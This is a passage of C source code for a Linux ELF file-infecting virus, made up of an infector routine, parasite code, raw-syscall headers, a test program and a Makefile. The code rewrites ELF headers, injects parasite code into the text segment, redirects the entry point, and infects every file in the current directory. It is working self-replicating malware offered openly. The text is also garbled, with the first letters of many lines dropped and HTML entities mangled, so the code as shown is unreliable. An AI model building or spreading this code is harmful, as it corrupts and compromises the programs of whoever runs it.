/* Locate the text segment */
txt_index = 0;
while (1) {
if (txt_index == ehdr->e_phnum - 1)
goto err;
if (phdr[txt_index].p_type == PT_LOAD
amp;& phdr[txt_index].p_flags == (PF_R|PF_X)) { /* text segment */
if (phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz + align_code_size
gt; phdr[txt_index+1].p_vaddr) {
V_DEBUG_WRITE(1, &luck, sizeof(luck));
goto err;
}
reak;
}
txt_index++;
}
/* Modify the entry point of the ELF */
org_entry = ehdr->e_entry;
ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;
ew_code_pos =
(void *) ehdr + phdr[txt_index].p_offset + phdr[txt_index].p_filesz;
/* Increase the p_filesz and p_memsz of text segment
* for new code */
hdr[txt_index].p_filesz += align_code_size;
hdr[txt_index].p_memsz += align_code_size;
for (i = 0; i < ehdr->e_phnum; i++)
if (phdr[i].p_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr)
hdr[i].p_offset += align_code_size;
tmp_flag = 0;
for (i = 0; i < ehdr->e_shnum; i++) {
if (shdr[i].sh_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr) {
hdr[i].sh_offset += align_code_size;
if (!tmp_flag && i) { /* associating the new_code to the last
* section in the text segment */
hdr[i-1].sh_size += align_code_size;
tmp_flag = 1;
}
}
}
/* Increase p_shoff in the ELF header */
ehdr->e_shoff += align_code_size;
/* Make a new file */
tmp_fd = g_open(tmpfile, O_WRONLY|O_CREAT|O_TRUNC, stat.st_mode);
if (tmp_fd == -1) {
goto err;
}
ize = new_code_pos - (void *) ehdr;
if (g_write(tmp_fd, ehdr, size) != size)
goto err;
__memcpy(tmp_v_code, v_code, v_code_size);
__memcpy(tmp_v_code + v_retaddr_addr_offset, &org_entry, sizeof(org_entry));
if (g_write(tmp_fd, tmp_v_code, align_code_size) != align_code_size) {
goto err;
}
if (g_write(tmp_fd, (void *) ehdr + size, stat.st_size - size)
!= stat.st_size - size) {
goto err;
}
g_close(tmp_fd);
g_munmap(ehdr, stat.st_size);
g_close(fd);
if (g_rename(tmpfile, file) == -1) {
goto err;
}
return 0;
err:
if (tmp_fd != -1)
g_close(tmp_fd);
if (ehdr)
g_munmap(ehdr, stat.st_size);
if (fd != -1)
g_close(fd);
return -1;
}
tatic inline void virus_code(void)
{
char dirdata[4096];
truct dirent *dirp;
int curfd;
int nbyte, c;
unsigned long para_code_start_addr;
__asm__ volatile (
"push %%eax\n\t"
"push %%ecx\n\t"
"push %%edx\n\t"
::);
char curdir[2] = {'.', 0};
char newline = '\n';
curdir[0] = '.';
curdir[1] = 0;
ewline = '\n';
if ((curfd = g_open(curdir, O_RDONLY, 0)) < 0)
goto out;
/* Get start address of virus code */
__asm__ volatile (
"jmp get_start_addr\n"
"infect_start:\n\t"
"popl %0\n\t"
:"=m" (para_code_start_addr)
:);
ara_code_start_addr -= PARACODE_RETADDR_ADDR_OFFSET - 1;
/* Infecting */
while ((nbyte = g_getdents(curfd, (struct dirent *)
amp;dirdata, sizeof(dirdata))) > 0) {
c = 0;
dirp = (struct dirent *) &dirdata;
do {
V_DEBUG_WRITE(1, dirp->d_name, dirp->d_reclen - (unsigned long)
amp;(((struct dirent *) 0)->d_name));
V_DEBUG_WRITE(1, &newline, sizeof(newline));
infect_virus(dirp->d_name,
(void *) para_code_start_addr,
PARACODE_LENGTH,
PARACODE_RETADDR_ADDR_OFFSET);
c += dirp->d_reclen;
if (c >= nbyte)
reak;
dirp = (struct dirent *)((char *)dirp + dirp->d_reclen);
} while (1);
}
g_close(curfd);
out:
__asm__ volatile (
"popl %%edx\n\t"
"popl %%ecx\n\t"
"popl %%eax\n\t"
"addl $0x102c, %%esp\n\t"
"popl %%ebx\n\t"
"popl %%esi\n\t"
"popl %%edi\n\t"
"popl %%ebp\n\t"
"jmp return\n"
"get_start_addr:\n\t"
"call infect_start\n"
"return:\n\t"
"push $0xAABBCCDD\n\t" /* push ret_addr */
"ret\n"
::);
}
void parasite_code(void)
{
virus_code();
}
void parasite_code_end(void) {parasite_code();}
------------------------------ gvirus.c ------------------------------
------------------------------ gunistd.h ------------------------------
#ifndef _G2_UNISTD_
#define _G2_UNISTD_
#define g__syscall_return(type, res) \
do { \
if ((unsigned long)(res) >= (unsigned long)(-125)) { \
res = -1; \
} \
return (type) (res); \
} while (0)
#define g_syscall0(type,name) \
type g_##name(void) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name)); \
g__syscall_return(type,__res); \
}
#define g_syscall1(type,name,type1,arg1) \
type g_##name(type1 arg1) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1))); \
g__syscall_return(type,__res); \
}
#define g_syscall2(type,name,type1,arg1,type2,arg2) \
type g_##name(type1 arg1,type2 arg2) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \
g__syscall_return(type,__res); \
}
#define g_syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type g_##name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3))); \
g__syscall_return(type,__res); \
}
#define g_syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \
type g_##name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4))); \
g__syscall_return(type,__res); \
}
#define g_syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
type5,arg5) \
type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5))); \
g__syscall_return(type,__res); \
}
#define g_syscall6(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
type5,arg5,type6,arg6) \
type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5,type6 arg6) \
{ \
long __res; \
__asm__ volatile ("push %%ebp ; movl %%eax,%%ebp ; movl %1,%%eax ; int $0x80 ; pop %%ebp" \
: "=a" (__res) \
: "i" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5)), \
"0" ((long)(arg6))); \
g__syscall_return(type,__res); \
}
#endif /* _G2_UNISTD_ */
------------------------------ gunistd.h ------------------------------
------------------------------ gsyscall.h ------------------------------
#ifndef _G2_SYSCALL_
#define _G2_SYSCALL_
#include <sys/types.h>
#include <sys/mman.h>
#include <linux/unistd.h>
#include <linux/fcntl.h>
#include "gunistd.h"
#define NULL 0
truct dirent {
long d_ino;
unsigned long d_off;
unsigned short d_reclen;
char d_name[256]; /* We must not include limits.h! */
};
truct stat {
unsigned long st_dev;
unsigned long st_ino;
unsigned short st_mode;
unsigned short st_nlink;
unsigned short st_uid;
unsigned short st_gid;
unsigned long st_rdev;
unsigned long st_size;
unsigned long st_blksize;
unsigned long st_blocks;
unsigned long st_atime;
unsigned long st_atime_nsec;
unsigned long st_mtime;
unsigned long st_mtime_nsec;
unsigned long st_ctime;
unsigned long st_ctime_nsec;
unsigned long __unused4;
unsigned long __unused5;
};
tatic inline g_syscall3(int, write, int, fd, const void *, buf, off_t, count);
tatic inline g_syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count);
tatic inline g_syscall3(int, open, const char *, file, int, flag, int, mode);
tatic inline g_syscall1(int, close, int, fd);
tatic inline g_syscall6(void *, mmap2, void *, addr, size_t, len, int, prot,
int, flags, int, fd, off_t, offset);
tatic inline g_syscall2(int, munmap, void *, addr, size_t, len);
tatic inline g_syscall2(int, rename, const char *, oldpath, const char *, newpath);
tatic inline g_syscall2(int, fstat, int, filedes, struct stat *, buf);
tatic inline void * __memcpy(void * to, const void * from, size_t n)
{
int d0, d1, d2;
__asm__ __volatile__(
"rep ; movsl\n\t"
"testb $2,%b4\n\t"
"je 1f\n\t"
"movsw\n"
"1:\ttestb $1,%b4\n\t"
"je 2f\n\t"
"movsb\n"
"2:"
: "=&c" (d0), "=&D" (d1), "=&S" (d2)
:"0" (n/4), "q" (n),"1" ((long) to),"2" ((long) from)
: "memory");
return (to);
}
#endif /* _G2_SYSCALL_ */
------------------------------ gsyscall.h ------------------------------
------------------------------ foo.c ------------------------------
#include <stdio.h>
int main()
{
uts("real elf point");
return 0;
}
------------------------------ foo.c ------------------------------
------------------------------ Makefile ------------------------------
all: foo gei
gei: g-elf-infector.c gvirus.o
gcc -O2 $< gvirus.o -o gei -Wall -DNDEBUG
foo: foo.c
gcc $< -o foo
gvirus.o: gvirus.c
gcc $< -O2 -c -o gvirus.o -fomit-frame-pointer -Wall -DNDEBUG
clean:
rm *.o -rf
rm foo -rf
rm gei -rf
------------------------------ Makefile ------------------------------